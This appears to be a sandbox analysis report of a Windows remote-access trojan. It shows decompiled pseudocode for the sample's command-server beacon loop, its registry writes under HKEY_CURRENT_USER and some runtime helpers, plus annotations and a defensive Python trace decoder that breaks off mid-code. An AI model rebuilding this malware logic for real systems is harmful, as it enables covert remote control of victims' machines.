                                    						_t237 = L00410A30(L00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233);
                                    						_t708 = _t704 + 0x60;
                                    						if(_t237 != 0) {
                                    							L00405A0B(_t381,  &_v80,  &_v2436);
                                    						}
                                    						_t238 =  *0x46bd44; // 0x0
                                    						_t681 = 0;
                                    						_t722 = _t238;
                                    						if(_t238 != 0) {
                                    							_t681 =  *_t238() & 0x0000ffff;
                                    						}
                                    						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\DpiScaling.exe");
                                    						_t709 = _t708 - 0x18;
                                    						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
                                    						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
                                    						_t243 = L00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
                                    						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
                                    						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
                                    						_t251 = E0041739C(_t381,  &_v1292, E0041719C( &_v1316));
                                    						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
                                    						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
                                    						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
                                    						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
                                    						_t257 = E0040D1E5( &_v1172);
                                    						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
                                    						_t617 = L00402F93(_t381,  &_v212, L00402F93(_t381,  &_v188, L00402F93(_t381,  &_v260, L00402F1D( &_v284, L00402F93(_t381,  &_v308, L00402F1D( &_v332, L00402F93(_t381,  &_v356, L00402F93(_t381,  &_v380, L00402F93(_t381,  &_v404, L00402F93(_t381,  &_v428, L00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, L00402F93(_t381,  &_v500, L00402F1D( &_v524, L00402F93(_t381,  &_v548, L00402F1D( &_v572, L00402F93(_t381,  &_v596, L0040759C(_t381,  &_v620, L00402F93(_t381,  &_v644, L00402F1D( &_v668, L00402F93(_t381,  &_v692, L00402F1D( &_v716, L00402F93(_t381,  &_v740, L00402F1D( &_v764, L00402F93(_t381,  &_v788, L00402F1D( &_v812, L00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, L00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, L00402F93(_t381,  &_v932, L00402F1D( &_v956, L00402F93(_t381,  &_v980, L00402F93(_t381,  &_v1004, L00402F93(_t381,  &_v1028, L00402F1D( &_v1052, L00402F93(_t381,  &_v1076, L00402F1D( &_v1100, L00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Sept-AITAB5"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
                                    						L00402F93(_t381, _t709, _t297, _t722, "Exe");
                                    						_push(0x4b);
                                    						L00404AA4(_t381, 0x46c780, _t297, _t722);
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401EF0();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401EF0();
                                    						L00404BBE(0x46c780, _t297, E004123B9, 1);
                                    						_t353 =  *0x46bd48; // 0x0
                                    						if(_t353 != 0 &&  *0x46bd4d != 0) {
                                    							_t353 =  *_t353();
                                    							 *0x46bd4d = 0;
                                    						}
                                    						if( *0x46c39a != 0) {
                                    							_t353 = L0040951E(_t381, 0x46c350);
                                    						}
                                    						L004059C5(_t353);
                                    						_t710 = _t709 - 0x18;
                                    						E00402084(_t381, _t710, "Disconnected!");
                                    						_t711 = _t710 - 0x18;
                                    						E00402084(_t381, _t711, "[Info]");
                                    						L00416C80(_t381, 0x46c238);
                                    						_t697 = _t711 + 0x30;
                                    						if( *0x46bea4 != 0) {
                                    							CreateThread(0, 0, L0041667F, 0, 0, 0);
                                    						}
                                    						L00401FC7();
                                    						L00401EF0();
                                    					}
                                    					_t684 = _v8;
                                    					_t677 = 0x46c578;
                                    				}
                                    				_t684 = _t684 - 1;
                                    				_v8 = _t684;
                                    				_t381 = _t381 + 1;
                                    				_t198 = E004021F5( &_v32);
                                    				_t728 = _t381 - _t198;
                                    				if(_t381 >= _t198) {
                                    					_t200 = 2;
                                    					_t381 = 0;
                                    					_t204 = L00436769(_t201, L00401F95(L00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
                                    					_t715 = _t204;
                                    					Sleep(_t204); // executed
                                    				}
                                    				L00401E74( &_v20, _t617);
                                    				goto L4;
                                    			}

                                    APIs
                                    • Sleep.KERNEL32(00000000,00000029,76D243E0,0046C578,00000000), ref: 0041197A
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    • gethostbyname.WS2_32(00000000), ref: 00411B6B
                                    • htons.WS2_32(00000000), ref: 00411BA9
                                    • Sleep.KERNELBASE(00000000,00000002), ref: 004123A6
                                      • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                      • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                      • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                                    • GetTickCount.KERNEL32 ref: 00411DA2
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    • CreateThread.KERNEL32(00000000,00000000,0041667F,00000000,00000000,00000000), ref: 00412355
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                                    • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\DpiScaling.exe$Connected to $Connecting to $Disconnected!$Exe$Sept-AITAB5$[Info]$name
                                    • API String ID: 2130001850-3324633824
                                    • Opcode ID: 84124b14032a4df0096ec80117b5006fc14e4facae42a20016c6dca21af4b9ea
                                    • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                                    • Opcode Fuzzy Hash: 84124b14032a4df0096ec80117b5006fc14e4facae42a20016c6dca21af4b9ea
                                    • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0041805B(void* __ecx, void* __edx, intOrPtr _a4) {
                                    				char _v524;
                                    				char _v544;
                                    				char _v560;
                                    				char _v572;
                                    				void* _v576;
                                    				char _v580;
                                    				char _v584;
                                    				char _v600;
                                    				char _v608;
                                    				char _v616;
                                    				char _v620;
                                    				void* _v624;
                                    				char _v628;
                                    				char _v632;
                                    				char _v636;
                                    				char _v644;
                                    				void* _v648;
                                    				char _v652;
                                    				void* _v672;
                                    				void* __ebx;
                                    				signed int _t36;
                                    				void* _t39;
                                    				void* _t40;
                                    				void* _t77;
                                    
                                    				_t73 = __edx;
                                    				_t77 = __ecx;
                                    				_t54 = __edx;
                                    				L00401F6D(__edx,  &_v644);
                                    				_t36 = __edx + 0xffffffd0;
                                    				_t85 = _t36 - 7;
                                    				if(_t36 <= 7) {
                                    					switch( *((intOrPtr*)(_t36 * 4 +  &M00418237))) {
                                    						case 0:
                                    							_push(L"Temp");
                                    							goto L14;
                                    						case 1:
                                    							__ecx =  &_v620;
                                    							__eax = L00416D45(__ebx,  &_v620);
                                    							__ecx =  &_v644;
                                    							__eax = L00401EFA( &_v644, __edx, __esi, __eax);
                                    							goto L4;
                                    						case 2:
                                    							_push(L"SystemDrive");
                                    							goto L14;
                                    						case 3:
                                    							_push(L"WinDir");
                                    							goto L14;
                                    						case 4:
                                    							__eax = L00417614(__ecx);
                                    							__eflags = __al;
                                    							if(__eflags != 0) {
                                    								__ecx =  &_v620;
                                    								E0040427F(__ebx, __ecx, L"\\SysWOW64") = L0043987F(__ebx, __ecx, __eflags, L"WinDir");
                                    								__ecx =  &_v600;
                                    								__edx = __eax;
                                    								__ecx =  &_v580;
                                    								__eax = E00403030( &_v580, __edx, __eax);
                                    								__ecx =  &_v652;
                                    								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
                                    								__ecx =  &_v584;
                                    								__eax = L00401EF0();
                                    								__ecx =  &_v608;
                                    								__eax = L00401EF0();
                                    								L4:
                                    								__ecx =  &_v620;
                                    								goto L5;
                                    							} else {
                                    								__ecx =  &_v572;
                                    								E0040427F(__ebx, __ecx, L"\\system32") = L0043987F(__ebx, __ecx, __eflags, L"WinDir");
                                    								__ecx =  &_v600;
                                    								__edx = __eax;
                                    								__ecx =  &_v628;
                                    								__eax = E00403030( &_v628, __edx, __eax);
                                    								__ecx =  &_v652;
                                    								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
                                    								__ecx =  &_v632;
                                    								__eax = L00401EF0();
                                    								__ecx =  &_v608;
                                    								__eax = L00401EF0();
                                    								__ecx =  &_v584;
                                    								L5:
                                    								__eax = L00401EF0();
                                    								goto L15;
                                    							}
                                    							L16:
                                    						case 5:
                                    							_push(L"ProgramFiles");
                                    							goto L14;
                                    						case 6:
                                    							_push(L"AppData");
                                    							goto L14;
                                    						case 7:
                                    							_push(L"UserProfile"); // executed
                                    							L14:
                                    							_t51 = L0043987F(_t54, _t57, _t85); // executed
                                    							L00409DC9(_t54,  &_v644, _t51);
                                    							goto L15;
                                    					}
                                    				}
                                    				L15:
                                    				__imp__GetLongPathNameW(L00401EEB( &_v644),  &_v524, 0x208); // executed
                                    				_t39 = E0040427F(_t54,  &_v560, _a4);
                                    				_t40 = E0040427F(_t54,  &_v636, "\\");
                                    				E00403030(_t77, E00403030( &_v600, E004183F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				L00401EF0();
                                    				return _t77;
                                    				goto L16;
                                    			}

                                    APIs
                                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-1609423294
                                    • Opcode ID: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
                                    • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                                    • Opcode Fuzzy Hash: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
                                    • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00404A08(void* __edx, char _a4) {
                                    				void* __ebx;
                                    				void* __ecx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t12;
                                    				signed int _t15;
                                    				void* _t16;
                                    				void* _t22;
                                    				void* _t23;
                                    				signed int _t25;
                                    				void* _t31;
                                    				char* _t32;
                                    				void* _t33;
                                    
                                    				_t22 = _t23;
                                    				_t32 =  &_a4;
                                    				_t2 = _t22 + 8; // 0x46dba0
                                    				_t12 = _t2;
                                    				_t31 = _t12;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsd"); // executed
                                    				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10); // executed
                                    				if(_t12 != 0) {
                                    					L5:
                                    					return 0;
                                    				}
                                    				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
                                    					L9:
                                    					return 1;
                                    				}
                                    				_t15 = L0041C71E(_t22, _t23); // executed
                                    				 *(_t22 + 0x44) = _t15;
                                    				if(_t15 == 0) {
                                    					goto L5;
                                    				}
                                    				_t30 =  *((intOrPtr*)(_t22 + 4));
                                    				_t16 = L0041C76C(_t15,  *((intOrPtr*)(_t22 + 4)));
                                    				_t25 =  *(_t22 + 0x44);
                                    				if(_t16 == 1) {
                                    					if(E0041D1ED() == 1) {
                                    						goto L9;
                                    					}
                                    					_t34 = _t33 - 0x18;
                                    					E00402084(_t22, _t33 - 0x18, "TLS Authentication failed");
                                    					E00402084(_t22, _t34 - 0x18, "[ERROR]");
                                    					_t16 = L0041C8E7(L00416C80(_t22, _t31),  *(_t22 + 0x44));
                                    					_t25 =  *(_t22 + 0x44);
                                    				}
                                    				L0041C763(_t16, _t22, _t25, _t30, _t31, _t32);
                                    				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
                                    				goto L5;
                                    			}

                                    APIs
                                    • connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: connect
                                    • String ID: TLS Authentication failed$[ERROR]
                                    • API String ID: 1959786783-1964023390
                                    • Opcode ID: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                                    • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                                    • Opcode Fuzzy Hash: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                                    • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
			E0043D15F(void* __ebx, signed short* _a4) {
				// Shape matches the MSVC CRT create_environment routine (an assumption from
				// structure, not from symbols): _a4 is a double-NUL-terminated wide-char
				// environment block and the result is a NULL-terminated array of heap copies
				// of every entry whose first character is not '='. Windows keeps hidden
				// per-drive entries such as "=C:=C:\..." in the block; the CRT drops them.
				// E0043F348 behaves like calloc(count, size); E004401F5 is _free (the API ID
				// the report assigns to this function).
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr* _v40;
				void* __ecx;
				signed int _t22;
				intOrPtr* _t24;
				signed short _t27;
				signed int _t28;
				void* _t31;
				void* _t33;
				intOrPtr _t34;
				intOrPtr* _t36;
				signed short _t39;
				signed short* _t41;
				void* _t43;
				signed short* _t48;
				signed int _t50;
				void* _t51;
				signed short* _t59;
				signed int _t61;
				signed short* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				signed short* _t68;
				signed short* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t79;

				_push(_t44);
				_push(_t44);
				_t41 = _a4;
				_v12 = 0;
				_t61 = 0;                                    // number of entries to keep
				_t22 =  *_t41 & 0x0000ffff;
				_t70 = _t41;
				if(_t22 != 0) {
					_t43 = 0x3d;                             // '='
					do {                                     // pass 1: count the entries that do not start with '='
						if(_t22 != _t43) {
							_t61 = _t61 + 1;
						}
						_t59 = _t70;
						_t3 =  &(_t59[1]); // 0x2
						_t68 = _t3;
						do {                                 // find the NUL (_v12 == 0) that ends this entry
							_t39 =  *_t59;
							_t59 =  &(_t59[1]);
						} while (_t39 != _v12);
						_t44 = _t59 - _t68 >> 1;
						_t70 =  &(( &(_t70[_t59 - _t68 >> 1]))[1]);   // advance to the next entry
						_t22 =  *_t70 & 0x0000ffff;
					} while (_t22 != 0);                     // an empty entry ends the block
					_t41 = _a4;
				}
				_t8 = _t61 + 1; // 0x1
				// calloc(count + 1, sizeof(wchar_t*)): one slot per kept entry plus the NULL terminator
				_t24 = E0043F348(_t44, _t8, 4); // executed
				_t64 = _t24;
				_t71 = 0;
				if(_t64 == 0) {
					L20:
					_t64 = _t71;                             // return NULL
					goto L21;
				} else {
					_v8 = _t64;                              // next free slot of the array
					while( *_t41 != _t71) {                  // pass 2: walk the block again until its empty entry
						_t48 = _t41;
						_t10 =  &(_t48[1]); // 0x2
						_t62 = _t10;
						do {
							_t27 =  *_t48;
							_t48 =  &(_t48[1]);
						} while (_t27 != _t71);
						_t50 = _t48 - _t62 >> 1;
						_t11 = _t50 + 1; // -1
						_t28 = _t11;                         // wide-char length of the entry including its NUL
						_t51 = 0x3d;                         // '='
						_v12 = _t28;
						if( *_t41 == _t51) {                 // hidden '=' entry: not copied
							L16:
							_t41 =  &(_t41[_t28]);           // step over the entry
							continue;
						} else {
							_t73 = E0043F348(_t51, _t28, 2); // calloc(len + 1, sizeof(wchar_t)) for the copy
							if(_t73 == 0) {                  // allocation failed: release what was built so far, return NULL
								_push(_t64);
								L23();
								_t71 = 0;
								E004401F5(0);
								goto L20;
							} else {
								_t31 = L004415D4(_t73, _v12, _t41);   // wcscpy_s-style copy (dst, dst size, src); non-zero means rejected
								_t79 = _t79 + 0xc;
								if(_t31 != 0) {
									// Rejected copy: a noreturn error path (five zero arguments, then int3).
									// From asm("int3") on, the decompiler has run into the NEXT function, a
									// loop that frees each array element and then the array itself (the CRT
									// free_environment shape). None of that code belongs to E0043D15F.
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t33 = L0043698A(0);
									asm("int3");
									_push(_t73);
									_t74 = _v40;
									if(_t74 != 0) {
										_t34 =  *_t74;
										_push(_t64);
										_t66 = _t74;
										while(_t34 != 0) {
											E004401F5(_t34);
											_t66 = _t66 + 4;
											_t34 =  *_t66;
										}
										_t33 = E004401F5(_t74);
									}
									return _t33;
								} else {
									_t36 = _v8;
									 *_t36 = _t73;                   // store the copy and move to the next slot
									_t71 = 0;
									_v8 = _t36 + 4;
									E004401F5(0);
									_t28 = _v12;
									goto L16;
								}
							}
						}
						goto L29;
					}
					L21:
					E004401F5(_t71);                         // _free(0): no-op
					return _t64;                             // the NULL-terminated array
				}
				L29:
			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                                    • Instruction ID: f0011bd8ba433ad85047860dc40924a10541953e35d1305fdf776f14d2f3b5fd
                                    • Opcode Fuzzy Hash: 8fd0c840282833bb3a8a99c20dbd839b9e3f6c12aa27e3cced7393c6cf30d85f
                                    • Instruction Fuzzy Hash: AF315F36D00210A7CF25AF69E841ABF77B4EF4C764F25409FFD0597240EA399D428798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
			E00410AA7(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				// Writes one registry value under HKEY_CURRENT_USER (0x80000001):
				// __edx = subkey path, _a4 = value name, _a8 = a string object holding the
				// data (L00401F95 yields its character pointer, E00402489 presumably its
				// length, which becomes cbData), _a32 = the value type handed straight to
				// RegSetValueExA. RegCreateKeyA creates the key when it is missing, so this is
				// a write, not a lookup. The trace below shows the call site 0x0040D161 with
				// the string "3.2.1 Pro" on the stack; the value name (0x00460614) and the
				// subkey path are not resolved on this page.
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;                                // key could not be created or opened: failure
				} else {
					_t15 = E00402489();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, L00401F95( &_a8), _t15); // executed
					RegCloseKey(_v8);
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;   // true iff RegSetValueExA returned ERROR_SUCCESS
				}
				L00401FC7();
				return _t20;
			}

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
                                    • RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
                                    • RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                    • Instruction ID: e89491bdbf644e4e0ba0d344bde8c25a895909b1be654527de0f828c9f06b44b
                                    • Opcode Fuzzy Hash: 2edf4e72d7368318f1ab4fa0488b4ca7c051504535841057f64486ea7e563853
                                    • Instruction Fuzzy Hash: 7FF0C232040208BFCB00AFA0DC05DEE3B6CEF04B91F104226BD05A61A1EB759F10DA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 66%
			E004108E2(void* __ecx, void* __edx, char* _a4, char* _a8) {
				// Reads a string value: __edx = root key (the trace below shows 0x80000002,
				// HKEY_LOCAL_MACHINE, at this call site), _a4 = subkey, _a8 = value name;
				// 0x20019 is KEY_READ. The result comes back as a string object (_t23, built
				// by E00402084 from the pushed pointer).
				// Caveats visible in the code: the 1024-byte stack buffer is never zeroed,
				// the value type is not requested (lpType = 0) and the RegQueryValueExA
				// return value is ignored, so when the value is absent the function builds
				// its string from whatever the stack held.
				void* _v8;
				int _v12;
				char _v1036;
				long _t11;
				void* _t19;
				void* _t23;

				_v12 = 0x400;                                // cbData in/out: 1024-byte buffer
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x45f6bc);                         // key missing: fall back to a fixed string at 0x45f6bc
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed   (return value unchecked)
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E00402084(_t19, _t23);                       // construct the result string from the pushed pointer
				return _t23;
			}

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
                                    • RegCloseKey.ADVAPI32(?), ref: 0041092C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                    • Instruction ID: 3e5bbf023fc67ff476987f8fad8e364188ed9517bf6302b110b94af4ea8623b3
                                    • Opcode Fuzzy Hash: 3efdacfa80388e9d7d057647b62979cc548e55fb5466ebc51e456bb7a03a6566
                                    • Instruction Fuzzy Hash: 66F0AFB5600308BBDB109F90DD05FED777C9B04B02F1000A6BB04B6191D6B4AB459BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
			E00410885(char* __edx, char* _a4, char* _a8) {
				// Reads a 4-byte (DWORD-sized) value from HKEY_CURRENT_USER: __edx = subkey,
				// _a4 = value name, _a8 = the caller's 4-byte output buffer. _v12 is cbData
				// (4) and _v16 receives the value type. Returns non-zero iff the query succeeded.
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;                                    // cbData = 4; the same 4 pre-seeds the type slot, which RegQueryValueExA overwrites
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed   (HKEY_CURRENT_USER, KEY_READ)
				if(_t14 != 0) {
					return 0;                                // key does not exist
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;   // true iff RegQueryValueExA returned ERROR_SUCCESS
			}

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                    • RegCloseKey.KERNELBASE(?), ref: 004108CE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                    • Instruction ID: 52561c361bf01b8e86e1a5ce9e630969f3828b93d2dbd7bb4aa450e57b23c49a
                                    • Opcode Fuzzy Hash: 3e4358ca8370b7af3e6ef31cc7bcc25504ab58a31ab422cbec18238428394246
                                    • Instruction Fuzzy Hash: A3F01D7690030CBFDF10AFA09C05FEEBBBCEB04B52F1041A5FA04E6195D2759B549B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%
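The three registry helpers above (E00410AA7, E004108E2, E00410885) are easiest to read from their call traces once the raw constants are named. The Python decoder below is an added example written for this page, not code from the sample or from Joe Sandbox: it parses the report's "• Api.Module(args), ref: addr" trace lines, names root keys and access masks, carries the root from each open/create to the value operation that follows it (the handle itself shows as ? in the trace) and lists writes under HKEY_CURRENT_USER, the usual home of user-level persistence. The sample lines are copied from the traces printed above; the value name at 0x00460614 and the subkey path cannot be resolved from this page, so the decoder does not guess them.

```python
import re

# Constructed sample: the registry call-trace lines printed in this report for
# E00410AA7, E004108E2 and E00410885, copied as shown (argument slots the
# sandbox could not resolve are printed as '?').
SAMPLE_TRACE = """
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
• RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
• RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9
• RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410904
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410923
• RegCloseKey.ADVAPI32(?), ref: 0041092C
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
• RegCloseKey.KERNELBASE(?), ref: 004108CE
"""

HKEY_ROOTS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}

# Composite masks from winreg.h are named first; anything else is broken into bits.
KEY_COMPOSITES = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
KEY_BITS = [
    (0x0001, "KEY_QUERY_VALUE"), (0x0002, "KEY_SET_VALUE"),
    (0x0004, "KEY_CREATE_SUB_KEY"), (0x0008, "KEY_ENUMERATE_SUB_KEYS"),
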